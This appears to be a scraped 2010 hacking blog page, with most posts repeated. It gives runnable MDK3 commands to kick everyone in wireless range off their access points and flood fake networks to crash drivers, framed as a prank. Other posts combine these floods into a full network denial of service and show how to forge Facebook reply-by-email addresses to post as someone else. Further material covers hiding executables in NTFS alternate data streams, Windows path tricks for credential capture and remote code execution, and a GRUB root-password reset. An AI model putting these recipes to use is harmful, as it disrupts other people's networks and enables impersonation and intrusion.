This tutorial is for educational purposes only I am not responsible for what you do with this information.
After all we don't learn to hack, we hack to learn.
Now what we are going to be doing is deauthentication all connected computer from an access point. Now I know what your thinking whats the big deal. Well what happens to people once they get disconnected they refresh the network list right. Right so when they are going to refresh the list we are going to flood the air with fake access points and when I mean flood we really flood the air some if not all computer wireless drivers will crash. I don't know about you but that sounds like allot of fun don't take this the wrong way I'm a good guy but sometimes good guys get bored and want to see people's reaction when something does go wrong and they start restarting their computers. So if this sounds kinda fun to do to your dad, mom, sister, friend or whoever is ON YOUR OWN NETWORK then what the hell give it a try.
Let's get started
About MDK3
Using MDK3 is quite simple, since it comes with lots of help screens directly included in the code.
You can easily access them by typing only mdk3
MDK3 displays the main help screen. To see all possible options, type mdk3 --fullhelp
To see only information for a specific test, type mdk3 --help followed by the test mode identifier (b, a, p, d, m or x)
Before you can use MDK3, you need to setup your wireless adaptor. As far as there are different driver architectures, the way to setup your adaptor may vary depending on which driver is in use. To make this procedure easy, it is recommended to use airmon-ng from the aircrack project, since this can setup almost every known driver correctly.
To enable injection, your card needs to be started, switched to the monitor and a bitrate and channel have to be set.
Now lets put our wireless interface in monitor mode and a quick ifconfig to find out our mac address.
airmon-ng start wlan0
ifconfig
Lets go to the mdk3 directory
cd /pentest/wireless/mdk3
Now we want to deauthenticated everyone in our WLAN range in order to do that we need to make a list of mac numbers that we DO NOT WANT TO GET AFFECTED witch is call a whitelist. So in my whitelist I'm going to be just adding my mac address because I don't care about all the others. So copy you mac address and type this in the MDK3 directory.
echo YOUR_MAC > whitelist
echo 00:24:2b:7c:3e:9d > whitelist
Now let's look at our d option the Deauthentication / Disassociation Amok Mode:
d - Deauthentication / Disassociation Amok Mode
Kicks everybody found from AP
OPTIONS:
-w
Read file containing MACs not to care about (Whitelist mode)
-b
Read file containing MACs to run test on (Blacklist Mode)
-s
Set speed in packets per second (Default: unlimited)
-c [chan,chan,chan,...]
Enable channel hopping. Without providing any channels, mdk3 will hop an all
14 b/g channels. Channel will be changed every 5 seconds.
So what we are going to use is the w option whitelist mode. leave the s option alone it's set to unlimited. Now the c option channel is up to you but I'm going with all AP's on channel 6 because most AP's are on that channel by default.
./mdk3 mon0 d -w whitelist -c 6
So now we have successfully launched the attack soon everyone will be disconnected. Now lets start flooding the air with fake access points. Open a new shell and browse to MDK3 directory and run this.
./mdk3 mon0 b -g -c 6
b - Beacon Flood Mode
Sends beacon frames to show fake APs at clients.
This can sometimes crash network scanners and even drivers!
OPTIONS:
-n
Use SSID instead of randomly generated ones
-f
Read SSIDs from file
-v
Read MACs and SSIDs from file. See example file!
-d
Show station as Ad-Hoc
-w
Set WEP bit (Generates encrypted networks)
-g
Show station as 54 Mbit
-t
Show station using WPA TKIP encryption
-a
Show station using WPA AES encryption
-m
Use valid accesspoint MAC from OUI database
-h
Hop to channel where AP is spoofed
This makes the test more effective against some devices/drivers
But it reduces packet rate due to channel hopping.
-c
Fake an AP on channel . If you want your card to hop on
this channel, you have to set -h option, too!
-s
Set speed in packets per second (Default: 50)
a - Authentication DoS mode
Now let me explain the b options is beacon flood mode. The -g option is Show station as 54 Mbit. -c option is channel now you can put an h if you want it to hope but if you specify a channel it will produce fake APs faster.
Now when the user refreshes his network list he should a never ending scan in linux or windows.
And thats it for this tutorial.
After all we don't learn to hack, we hack to learn.
Now what we are going to be doing is deauthentication all connected computer from an access point. Now I know what your thinking whats the big deal. Well what happens to people once they get disconnected they refresh the network list right. Right so when they are going to refresh the list we are going to flood the air with fake access points and when I mean flood we really flood the air some if not all computer wireless drivers will crash. I don't know about you but that sounds like allot of fun don't take this the wrong way I'm a good guy but sometimes good guys get bored and want to see people's reaction when something does go wrong and they start restarting their computers. So if this sounds kinda fun to do to your dad, mom, sister, friend or whoever is ON YOUR OWN NETWORK then what the hell give it a try.
Let's get started
About MDK3
Using MDK3 is quite simple, since it comes with lots of help screens directly included in the code.
You can easily access them by typing only mdk3
MDK3 displays the main help screen. To see all possible options, type mdk3 --fullhelp
To see only information for a specific test, type mdk3 --help followed by the test mode identifier (b, a, p, d, m or x)
Before you can use MDK3, you need to setup your wireless adaptor. As far as there are different driver architectures, the way to setup your adaptor may vary depending on which driver is in use. To make this procedure easy, it is recommended to use airmon-ng from the aircrack project, since this can setup almost every known driver correctly.
To enable injection, your card needs to be started, switched to the monitor and a bitrate and channel have to be set.
Now lets put our wireless interface in monitor mode and a quick ifconfig to find out our mac address.
airmon-ng start wlan0
ifconfig
Lets go to the mdk3 directory
cd /pentest/wireless/mdk3
Now we want to deauthenticated everyone in our WLAN range in order to do that we need to make a list of mac numbers that we DO NOT WANT TO GET AFFECTED witch is call a whitelist. So in my whitelist I'm going to be just adding my mac address because I don't care about all the others. So copy you mac address and type this in the MDK3 directory.
echo YOUR_MAC > whitelist
echo 00:24:2b:7c:3e:9d > whitelist
Now let's look at our d option the Deauthentication / Disassociation Amok Mode:
d - Deauthentication / Disassociation Amok Mode
Kicks everybody found from AP
OPTIONS:
-w
Read file containing MACs not to care about (Whitelist mode)
-b
Read file containing MACs to run test on (Blacklist Mode)
-s
Set speed in packets per second (Default: unlimited)
-c [chan,chan,chan,...]
Enable channel hopping. Without providing any channels, mdk3 will hop an all
14 b/g channels. Channel will be changed every 5 seconds.
So what we are going to use is the w option whitelist mode. leave the s option alone it's set to unlimited. Now the c option channel is up to you but I'm going with all AP's on channel 6 because most AP's are on that channel by default.
./mdk3 mon0 d -w whitelist -c 6
So now we have successfully launched the attack soon everyone will be disconnected. Now lets start flooding the air with fake access points. Open a new shell and browse to MDK3 directory and run this.
./mdk3 mon0 b -g -c 6
b - Beacon Flood Mode
Sends beacon frames to show fake APs at clients.
This can sometimes crash network scanners and even drivers!
OPTIONS:
-n
Use SSID instead of randomly generated ones
-f
Read SSIDs from file
-v
Read MACs and SSIDs from file. See example file!
-d
Show station as Ad-Hoc
-w
Set WEP bit (Generates encrypted networks)
-g
Show station as 54 Mbit
-t
Show station using WPA TKIP encryption
-a
Show station using WPA AES encryption
-m
Use valid accesspoint MAC from OUI database
-h
Hop to channel where AP is spoofed
This makes the test more effective against some devices/drivers
But it reduces packet rate due to channel hopping.
-c
Fake an AP on channel . If you want your card to hop on
this channel, you have to set -h option, too!
-s
Set speed in packets per second (Default: 50)
a - Authentication DoS mode
Now let me explain the b options is beacon flood mode. The -g option is Show station as 54 Mbit. -c option is channel now you can put an h if you want it to hope but if you specify a channel it will produce fake APs faster.
Now when the user refreshes his network list he should a never ending scan in linux or windows.
And thats it for this tutorial.
Friday, 5 March 2010
Here we go again...
e.g. Jan 20 (day of the post on the wall)==> 1830 base 10 = 1eu
Jan 21 will be iev etc
I have been playing, at this point, for a while with Facebook's security as you can see here and here. Not too seriously though, also because, as who knows me well knows, that I am far away to be a security expert. I tend to observe though, and do a bunch of questions to myself . Sometimes I am able to find an answer as in the case of this post.
You might be aware of the new features of Facebook: Reply to this email to comment on this status. Sean from F-Secure discover that anyone can use the Reply To address, from any e-mail account.
I have tried to go further. Can anyone guess the email address in order to pretend to be the real account holder? The answer surprisely is YES!!! :-S
As long you have any kind of access to the wall though (this happens either if you are friends of the account holder or the account holder has the wall public). Here how to reckon it :
All you need is:
- know how to convert a number from base 10 to base 36 (if you don't know how use this)
- the profile_id of the account holder (available on the URL of the account holder facebook page)
- story_id and story_type (again easily accessible from the URL on the wall)
- the current date (yes you undestood well the current day :D, e.g. today 27/02/2010)
That all you need!! Now follow this steps:
let try to do a reverse engineer approach. This is our final goal:
c+2xxxxxx000000afwdwo0m00003c6efyz2000000afwdwo
0000000000001eu1i@reply.facebook.com
0000000000001eu1i@reply.facebook.com
N.B. note the 6 "avoid spam" xxxxx :D
Any way lets split the email address as follow:
- c+2
- xxxxxx
- 000000afwdwo
- 0m
- 00003c6efyz2
- 000000afwdwo
- 000000000000
- 1eu
- 1i
- @reply.facebook.com
So here the magic reckon trick:
- chunck 3 and chunck 6 come directly from my profile_id: (631367016) base10 = afwdwo base36 (adding 000000 6 zeros to arrive to 11 digits)
- chunck 4 comes from story_type : story_type= 22 base10= 0m base36
- chunck 5 is the story_id (again in base 36): 261600937166 in base 10= 3c6efyz2 in base36 (adding 0000 4 zeros to arrive to 12 digits)
- chunk 8 is a counter incrementing every day (still in base 36):
- chunck 1,9,10 are always the same
- chunk 7 will be the topic for my next post but for this purpose consider as a constant as above (always 000000000000, is 12 digits it is any hint ? :D)
And chunk 2? Well I leave to you the fun to find out :D
Well that's it. I hope I you find this interesting and I leave you with a question :
Is base 36 enough cryptic :D? And is Facebook using this great alghoritm anywhere else?
Cheers and stay tuned
Friday, 19 February 2010
Alternate Data Streams are extremely easy to make and require little or no skill on the part o the hacker. Common DOS commands like “type” are used to create an ADS. These commands are used in conjunction with a redirect [>] and colon [:] to fork one file into another.
For instance: the command
“type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe”
will fork the common windows calculator program with an ADS “anyfile.exe.”
Alarmingly files with an ADS are almost impossible to detect using native file browsing techniques like command line or windows explorer. In our example, the file size of calc.exe will show as the original size of 90k regardless of the size of the ADS anyfile.exe. The only indication that the file was changed is the modification time stamp, which can be relatively innocuous.
Once injected, the ADS can be executed by using traditional commands like type, or start or be scripted inside typical scripting languages like VB or Perl. When launched, the ADS executable will appear to run as the original file - looking undetectable to process viewers like Windows Task Manager. Using this method, it is not only possible to hide a file, but to also hide the execution of an illegitimate process.
Unfortunately, it is virtually impossible to natively protect your system against ADS hidden files if you use NTFS. The use of Alternate Data Streams is not a feature that can be disabled and currently there is no way to limit this capability against files that the user already has access to. Freeware programs like lads.exe by Frank Heyne (www.heysoft.de) and crucialADS by CrucialSecurity can be used to manually audit your files for the presence of Alternate Data Streams. Alternatively, the action of moving a file into another file system that doesn’t support ADS will automatically destroy any Alternate Data Streams.
Ultimately only a third party file checksum application can effectively maintain the integrity of an NTFS partition against unauthorized Alternate Data Streams. Recently dubbed as host based “Intrusion Prevention Systems” or “Intrusion Detection Systems”, third party security applications like eTrust Access Control from Computer Associates have been used for years in high-end government networks to verify the integrity of files used in the most secure environments. In addition to a heightened level of auditing and access control, these applications typically create an MD5 hashed database of file checksums that are used to validate a file’s trustworthiness. File injection techniques like Alternate Data Streams trigger an action by which the file is deemed untrusted and therefore prevented from executing or better yet, prevented from being changed in the first place.
In order to fully understand the implications of alternate data streams, the following walkthrough the creation and execution of an ADS using standard Windows 2000 programs on an NTFS 5.0 partition.
Figure 1 shows the executable file for the standard windows program calculator, calc.exe, with the original size of 90KB and a date modified time stamp of 7/26/2000.
We then append an alternate data stream to calc.exe with another standard windows program, notepad.exe as shown in
Figure 3 shows that while notepad.exe is 50KB, the file size of calc.exe has not changed from the original 90KB. We do see however that the date modified time stamp has changed.
we execute the new ADS notepad.exe using the standard command start.
On our desktop, the program notepad is executed however, an examination of the Windows Task Manager shows the original file name calc.exe. (Figure 5).
Figure 5
Summary
Ultimately, the mere availability of Alternate Data Streams in NTFS is quite disconcerting and their usefulness suspect but in the end, the security features of NTFS far outweigh this potentially dangerous vulnerability. With knowledge and due diligence administrators can take actions to prevent and detect unauthorized use of ADS and in the end protect themselves adequately.
For instance: the command
“type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe”
will fork the common windows calculator program with an ADS “anyfile.exe.”
Alarmingly files with an ADS are almost impossible to detect using native file browsing techniques like command line or windows explorer. In our example, the file size of calc.exe will show as the original size of 90k regardless of the size of the ADS anyfile.exe. The only indication that the file was changed is the modification time stamp, which can be relatively innocuous.
Once injected, the ADS can be executed by using traditional commands like type, or start or be scripted inside typical scripting languages like VB or Perl. When launched, the ADS executable will appear to run as the original file - looking undetectable to process viewers like Windows Task Manager. Using this method, it is not only possible to hide a file, but to also hide the execution of an illegitimate process.
Unfortunately, it is virtually impossible to natively protect your system against ADS hidden files if you use NTFS. The use of Alternate Data Streams is not a feature that can be disabled and currently there is no way to limit this capability against files that the user already has access to. Freeware programs like lads.exe by Frank Heyne (www.heysoft.de) and crucialADS by CrucialSecurity can be used to manually audit your files for the presence of Alternate Data Streams. Alternatively, the action of moving a file into another file system that doesn’t support ADS will automatically destroy any Alternate Data Streams.
Ultimately only a third party file checksum application can effectively maintain the integrity of an NTFS partition against unauthorized Alternate Data Streams. Recently dubbed as host based “Intrusion Prevention Systems” or “Intrusion Detection Systems”, third party security applications like eTrust Access Control from Computer Associates have been used for years in high-end government networks to verify the integrity of files used in the most secure environments. In addition to a heightened level of auditing and access control, these applications typically create an MD5 hashed database of file checksums that are used to validate a file’s trustworthiness. File injection techniques like Alternate Data Streams trigger an action by which the file is deemed untrusted and therefore prevented from executing or better yet, prevented from being changed in the first place.
In order to fully understand the implications of alternate data streams, the following walkthrough the creation and execution of an ADS using standard Windows 2000 programs on an NTFS 5.0 partition.
Figure 1 shows the executable file for the standard windows program calculator, calc.exe, with the original size of 90KB and a date modified time stamp of 7/26/2000.
We then append an alternate data stream to calc.exe with another standard windows program, notepad.exe as shown in
Figure 3 shows that while notepad.exe is 50KB, the file size of calc.exe has not changed from the original 90KB. We do see however that the date modified time stamp has changed.
we execute the new ADS notepad.exe using the standard command start.
On our desktop, the program notepad is executed however, an examination of the Windows Task Manager shows the original file name calc.exe. (Figure 5).
Figure 5
Summary
Ultimately, the mere availability of Alternate Data Streams in NTFS is quite disconcerting and their usefulness suspect but in the end, the security features of NTFS far outweigh this potentially dangerous vulnerability. With knowledge and due diligence administrators can take actions to prevent and detect unauthorized use of ADS and in the end protect themselves adequately.
Monday, 15 February 2010
strange windows file stuff
link to original document
http://www.coresecurity.com/files/attachmentsWindows%20File%20Pseudonyms%20Dan%20Crowley%20Shmoocom%202010.pdf
DOS special device files
• Similar to device files on *nix nix
• Allows file operations to be performed on
devices
• Examples include:
– CON the console
CON,
– PRN, a parallel printer
– COM1, the first serial port
– NUL, a bit bucket (/dev/null equivalent)
• Pretty well known already, BUT…
When you speak to me ~ I redirect all of it ~ To slash-dev-slash-null.
DOS special files quirk #1
• They exist “everywhere”
• Can be accessed from any path, even:
– Directories which you are denied access to
– With an existing file as a “directory” which “contains”
directory contains
the file
• Examples of equivalent paths to CON:
– CON
– C:\CON
– C:\..\..\..\..\..\CON
C:\ \ \ \ \ \CON
– C:\restricted_dir\CON
– C:\existing_file.txt\CON
Like apparitions ~ They exist in every place ~ And yet in no place
DOS special files quirk #2
• They can have any file extension it’s ignored
extension, it s
• The following examples are equivalent:
– CON
– CON.bat
– CON.php
– CON.conf
– CON.thisisalongandarbitraryfileextension
– CON.<1000x”A”>
Mr. Shakespeare knows ~ A rose by another name ~ Still smells just as sweet
Buffer overflow
• A Windows app cat o ta es in a file name
do s application takes e a e
• The file is verified as existing
• If it exists, the program does something with the
file name
– And might trust that it doesn’t exceed NTFS
limitations
• What if the file name is “CON.<‘A’x1000>”?
– Technically, it exists…
h ll
– …but not in the filesystem, so it’s not bound to NTFS
limitations
Why one needs all this ~ DOS file extension stuff ~ Is just beyond me
Controlling file handling
• Don’t forget:
Don t
– You can use ANY extension!
– Files are often handled based on extension
• DOS special files, then, can often be handled
as ANYTHING YOU CHOOSE!
• http://www.example.com/com1.php
– What if COM1 was attached to a serial modem?
– …Or more likely, a Bluetooth dongle?
A riddle for you… ~ When is a CON not a CON? ~ When it’s a dot-jar!
What an awful mess!
I can t write haiku about
can’t
Namespace prefixes...
NAMESPACE PREFIXES
Namespace prefixes
• Used when files can’t be referred to with
can t
normal paths
– Because they’re really devices
they re
– Because they don’t exist on the local filesystem
– Because they have strange names
A distant echo ~ Of a victim, falling dead ~ The hunter shouts “PWNED!”
Minimal parsing prefix
• An invalid name or path can sometimes be
used anyway
– MAX_PATH can be exceeded
– Some restricted characters can be used
– Reserved basenames can be used
• Just precede it with \\?\
– Must be an absolute path p
• No current directory indicator ( ./ )
• No parent directory indicator ( ../ )
You don’t like the rules? ~ Double wack, question mark, wack. ~ You’re welcome, buddy.
UNC (Short and Long)
• Used to refer to files on SMB shares
– Can be used to refer to files across the Internet
• \\server name or ip\share\file
\\server_name_or_ip\share\file
– This is “Short UNC”
– Nothing terribly special
• \\?\UNC\server_name_or_ip\share\file
– This is “Long UNC”
Long UNC
– Allows for the use of the \\?\ prefix with UNC
paths
What’s the best thing ~ About SMB traffic? ~ Credential replay!
NT device namespace prefix
• Used to refer to device namespace
• These paths start with \\.\
• Examples include:
– \\ \airpcap00\
\\.\airpcap00\
• An AirPcap card
– \\.\GLOBALROOT\Device\HarddiskVolume1\
• The first hard disk volume on the machine
• Might be equivalent to, for instance, C:\
• Doesn’t need an assigned drive letter!
– \\.\CdRom0\
• The first disc drive on the computer
• WinObj from Sysinternals will allow you to browse the NT
device namespace
The device namespace ~ Allows access to devices ~ Using file paths
NTLM credential capture
• When accessing SMB shares, authentication
may be requested
– If an attacker runs the SMB server, you can bet it ,y
will
• The SMB client machine will often send stored
credentials automatically
– And as you may know these credentials can be
replayed or cracked
l d k d
– And we can trigger a machine to access an SMB
share with a UNC path!
A replay attack ~ With SMB credentials ~ Should not still succeed!
Directory traversal
• “C:\” doesn’t match:
C:\ doesn t
– \\?\C:\
– \\127 0 0 1\C$\
\\127.0.0.1\C$\
– \\127.3.13.37\C$\
– \\?\UNC\127 0 0 1\C$\
\\?\UNC\127.0.0.1\C$\
– \\.\GLOBALROOT\Device\HarddiskVolume1\
• …but they’re all equivalent!
b h ’ ll l
It is hard to stop ~ Directory traversal ~ Now more than ever
Buffer overflow
• Minimal parsing prefix allows for the use of
paths exceeding MAX_PATH
– Some developers don t know you can exceed
don’t
MAX_PATH
– …or assume that if the file exists that it can’t
or can t
exceed MAX_PATH
NOP NOP NOP NOP NOP ~ NOP NOP NOP NOP NOP Shellcode ~ Pointer to NOP sled
Making Windows rootkits deadlier
• Imagine that you’re a Windows sysadmin
ag e t at you e do s sysad
• Someone creates a file named “CON” with the
minimal parsing p
p g prefix
• You try “type CON” at the command line
– Your command prompt “hangs”
– None of your programs open it properly
– Windows Explorer can’t delete it
– You cry
– You pretend it doesn’t exist
• or convince yourself it really should be there
My reaction to ~ “Undocumented feature” ~ Is unbridled rage.
Now I understand,
But I still don’t believe you.
don t
SHOW ME THE MONEY!
DEMONSTRATION:
NGINX AND PHP ON WINDOWS
Thank you!
There’s no dumb question…
“Is the computer plugged in?”
Is pretty bad, though
bad though.
Do I have the time
To continue presenting?
That sure would be nice…
BONUS ROUND (DELETED SLIDES)
So?
• So “file phtml” is processed as PHP code
file.phtml
– A d “FILE~1.PHT” i served without processing
And “FILE 1 PHT” is d ith t i
• So “file.phPWNED” can be uploaded
– And “FILE~1.PHP” can be executed
Wait, what did you say? ~ Remote code execution? ~ NOW I’m listening!
How are 8.3 aliases generated?
• It’s somewhat complicated, but in short:
– Remove incompatible characters
– Convert spaces to underscores
– Take the first six characters of the basename
– Add “~”
• The digit is used to distinguish files with names starting with the
same six characters
• This convention isn’t used after the first 3 collisions
– Truncate the file extension to three characters
– Make all the characters uppercase
• This is simplified due to time constraints, read my
paper for more details!
Your name is too long ~ And uses weird characters. ~ Here’s another one!
Denial of Service
Denial-of-Service
• A theoretical application accepts file names and
t eo et ca app cat o e a es a d
reads the associated files
• This application blocks any file named “CON”,
pp y
“AUX”, “PRN” etc. to prevent DoS
– Applications will generally pause to read from a file
until EOF
til
– EOF may never arrive from devices like AUX
• It does NOT block files named for instance
named, instance,
“AUX.txt”
– Which we know is equivalent to AUX
…And while we’re at it, ~ Since we’re speaking of Shakespeare… ~ All’s well that ends well!
http://www.coresecurity.com/files/attachmentsWindows%20File%20Pseudonyms%20Dan%20Crowley%20Shmoocom%202010.pdf
DOS special device files
• Similar to device files on *nix nix
• Allows file operations to be performed on
devices
• Examples include:
– CON the console
CON,
– PRN, a parallel printer
– COM1, the first serial port
– NUL, a bit bucket (/dev/null equivalent)
• Pretty well known already, BUT…
When you speak to me ~ I redirect all of it ~ To slash-dev-slash-null.
DOS special files quirk #1
• They exist “everywhere”
• Can be accessed from any path, even:
– Directories which you are denied access to
– With an existing file as a “directory” which “contains”
directory contains
the file
• Examples of equivalent paths to CON:
– CON
– C:\CON
– C:\..\..\..\..\..\CON
C:\ \ \ \ \ \CON
– C:\restricted_dir\CON
– C:\existing_file.txt\CON
Like apparitions ~ They exist in every place ~ And yet in no place
DOS special files quirk #2
• They can have any file extension it’s ignored
extension, it s
• The following examples are equivalent:
– CON
– CON.bat
– CON.php
– CON.conf
– CON.thisisalongandarbitraryfileextension
– CON.<1000x”A”>
Mr. Shakespeare knows ~ A rose by another name ~ Still smells just as sweet
Buffer overflow
• A Windows app cat o ta es in a file name
do s application takes e a e
• The file is verified as existing
• If it exists, the program does something with the
file name
– And might trust that it doesn’t exceed NTFS
limitations
• What if the file name is “CON.<‘A’x1000>”?
– Technically, it exists…
h ll
– …but not in the filesystem, so it’s not bound to NTFS
limitations
Why one needs all this ~ DOS file extension stuff ~ Is just beyond me
Controlling file handling
• Don’t forget:
Don t
– You can use ANY extension!
– Files are often handled based on extension
• DOS special files, then, can often be handled
as ANYTHING YOU CHOOSE!
• http://www.example.com/com1.php
– What if COM1 was attached to a serial modem?
– …Or more likely, a Bluetooth dongle?
A riddle for you… ~ When is a CON not a CON? ~ When it’s a dot-jar!
What an awful mess!
I can t write haiku about
can’t
Namespace prefixes...
NAMESPACE PREFIXES
Namespace prefixes
• Used when files can’t be referred to with
can t
normal paths
– Because they’re really devices
they re
– Because they don’t exist on the local filesystem
– Because they have strange names
A distant echo ~ Of a victim, falling dead ~ The hunter shouts “PWNED!”
Minimal parsing prefix
• An invalid name or path can sometimes be
used anyway
– MAX_PATH can be exceeded
– Some restricted characters can be used
– Reserved basenames can be used
• Just precede it with \\?\
– Must be an absolute path p
• No current directory indicator ( ./ )
• No parent directory indicator ( ../ )
You don’t like the rules? ~ Double wack, question mark, wack. ~ You’re welcome, buddy.
UNC (Short and Long)
• Used to refer to files on SMB shares
– Can be used to refer to files across the Internet
• \\server name or ip\share\file
\\server_name_or_ip\share\file
– This is “Short UNC”
– Nothing terribly special
• \\?\UNC\server_name_or_ip\share\file
– This is “Long UNC”
Long UNC
– Allows for the use of the \\?\ prefix with UNC
paths
What’s the best thing ~ About SMB traffic? ~ Credential replay!
NT device namespace prefix
• Used to refer to device namespace
• These paths start with \\.\
• Examples include:
– \\ \airpcap00\
\\.\airpcap00\
• An AirPcap card
– \\.\GLOBALROOT\Device\HarddiskVolume1\
• The first hard disk volume on the machine
• Might be equivalent to, for instance, C:\
• Doesn’t need an assigned drive letter!
– \\.\CdRom0\
• The first disc drive on the computer
• WinObj from Sysinternals will allow you to browse the NT
device namespace
The device namespace ~ Allows access to devices ~ Using file paths
NTLM credential capture
• When accessing SMB shares, authentication
may be requested
– If an attacker runs the SMB server, you can bet it ,y
will
• The SMB client machine will often send stored
credentials automatically
– And as you may know these credentials can be
replayed or cracked
l d k d
– And we can trigger a machine to access an SMB
share with a UNC path!
A replay attack ~ With SMB credentials ~ Should not still succeed!
Directory traversal
• “C:\” doesn’t match:
C:\ doesn t
– \\?\C:\
– \\127 0 0 1\C$\
\\127.0.0.1\C$\
– \\127.3.13.37\C$\
– \\?\UNC\127 0 0 1\C$\
\\?\UNC\127.0.0.1\C$\
– \\.\GLOBALROOT\Device\HarddiskVolume1\
• …but they’re all equivalent!
b h ’ ll l
It is hard to stop ~ Directory traversal ~ Now more than ever
Buffer overflow
• Minimal parsing prefix allows for the use of
paths exceeding MAX_PATH
– Some developers don t know you can exceed
don’t
MAX_PATH
– …or assume that if the file exists that it can’t
or can t
exceed MAX_PATH
NOP NOP NOP NOP NOP ~ NOP NOP NOP NOP NOP Shellcode ~ Pointer to NOP sled
Making Windows rootkits deadlier
• Imagine that you’re a Windows sysadmin
ag e t at you e do s sysad
• Someone creates a file named “CON” with the
minimal parsing p
p g prefix
• You try “type CON” at the command line
– Your command prompt “hangs”
– None of your programs open it properly
– Windows Explorer can’t delete it
– You cry
– You pretend it doesn’t exist
• or convince yourself it really should be there
My reaction to ~ “Undocumented feature” ~ Is unbridled rage.
Now I understand,
But I still don’t believe you.
don t
SHOW ME THE MONEY!
DEMONSTRATION:
NGINX AND PHP ON WINDOWS
Thank you!
There’s no dumb question…
“Is the computer plugged in?”
Is pretty bad, though
bad though.
Do I have the time
To continue presenting?
That sure would be nice…
BONUS ROUND (DELETED SLIDES)
So?
• So “file phtml” is processed as PHP code
file.phtml
– A d “FILE~1.PHT” i served without processing
And “FILE 1 PHT” is d ith t i
• So “file.phPWNED” can be uploaded
– And “FILE~1.PHP” can be executed
Wait, what did you say? ~ Remote code execution? ~ NOW I’m listening!
How are 8.3 aliases generated?
• It’s somewhat complicated, but in short:
– Remove incompatible characters
– Convert spaces to underscores
– Take the first six characters of the basename
– Add “~
• The digit is used to distinguish files with names starting with the
same six characters
• This convention isn’t used after the first 3 collisions
– Truncate the file extension to three characters
– Make all the characters uppercase
• This is simplified due to time constraints, read my
paper for more details!
Your name is too long ~ And uses weird characters. ~ Here’s another one!
Denial of Service
Denial-of-Service
• A theoretical application accepts file names and
t eo et ca app cat o e a es a d
reads the associated files
• This application blocks any file named “CON”,
pp y
“AUX”, “PRN” etc. to prevent DoS
– Applications will generally pause to read from a file
until EOF
til
– EOF may never arrive from devices like AUX
• It does NOT block files named for instance
named, instance,
“AUX.txt”
– Which we know is equivalent to AUX
…And while we’re at it, ~ Since we’re speaking of Shakespeare… ~ All’s well that ends well!
Thursday, 4 February 2010
mdk3 killer mode
mdk3 eth0 d # deauthentication attack
mdk3 eth0 a -a # authentication flood
mdk3 eth0 b -n MyEssid -w -c 11 # beacon flood mode
The combination is:
- Running beacon flood mode to generate fake APs with the same name as your
victim
- Auth-DoS the original AP with intelligent mode
- Use the amok mode to kick the clients
And for the next version of mdk3
- Use the upcoming WIDS confusion mode to cross-connect kicked clients to
real and fake APs making all security systems go FUBAR.
In this 802.11-hell, there should be nobody able to access the network.
Because:
-> They get kicked when they connect (Amok mode)
-> They will see thousands of APs, unable to know which is the one to connect,
thus they are just trying around blindly (beacon flood)
-> The original AP may be too busy to handle the real clients because of the
Auth-DoS
mdk3 eth0 a -a # authentication flood
mdk3 eth0 b -n MyEssid -w -c 11 # beacon flood mode
The combination is:
- Running beacon flood mode to generate fake APs with the same name as your
victim
- Auth-DoS the original AP with intelligent mode
- Use the amok mode to kick the clients
And for the next version of mdk3
- Use the upcoming WIDS confusion mode to cross-connect kicked clients to
real and fake APs making all security systems go FUBAR.
In this 802.11-hell, there should be nobody able to access the network.
Because:
-> They get kicked when they connect (Amok mode)
-> They will see thousands of APs, unable to know which is the one to connect,
thus they are just trying around blindly (beacon flood)
-> The original AP may be too busy to handle the real clients because of the
Auth-DoS
lost root password change on linux
let's say you've lost your root password, or simply cannot log in as root after a hard drive install, and have no privileged users on your system. I'm about to show you how to get back in the game as root with a quick and dirty password-change hack.
For this tutorial, everything that is italicized is a user action. Anything in "angle brackets" is a keystroke. If it has a + beside it, it means press the keys at the same time.
// Changing the root password:
= - = - = - = - = - = - = - = - = - = - =
Reboot your computer. Wait for the grub screen... Press "ESC" when you're prompted.
Highlight the first option.
Press "e".
Highlight the kernel line.
Press "e".
Press "TAB". You'll get an error message.
Press "ESC".
Press "e" again.
Using your arrow keys, scroll back and change ro to rw
At the end of the line add: init=/bin/bash
Press "Enter"
Press "b"
Type at the prompt: passwd root
Enter the new password twice.
Press "CTRL"+"d" to cause a nice Kernel Panic. This will cause your system to hang.
Press and hold your power button till it shuts down. Power back up and let it boot into BackTrack normally.
Log in as root with your new password.
For this tutorial, everything that is italicized is a user action. Anything in "angle brackets" is a keystroke. If it has a + beside it, it means press the keys at the same time.
// Changing the root password:
= - = - = - = - = - = - = - = - = - = - =
Reboot your computer. Wait for the grub screen... Press "ESC" when you're prompted.
Highlight the first option.
Press "e".
Highlight the kernel line.
Press "e".
Press "TAB". You'll get an error message.
Press "ESC".
Press "e" again.
Using your arrow keys, scroll back and change ro to rw
At the end of the line add: init=/bin/bash
Press "Enter"
Press "b"
Type at the prompt: passwd root
Enter the new password twice.
Press "CTRL"+"d" to cause a nice Kernel Panic. This will cause your system to hang.
Press and hold your power button till it shuts down. Power back up and let it boot into BackTrack normally.
Log in as root with your new password.
posted by 57005 at
9:38 AM
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home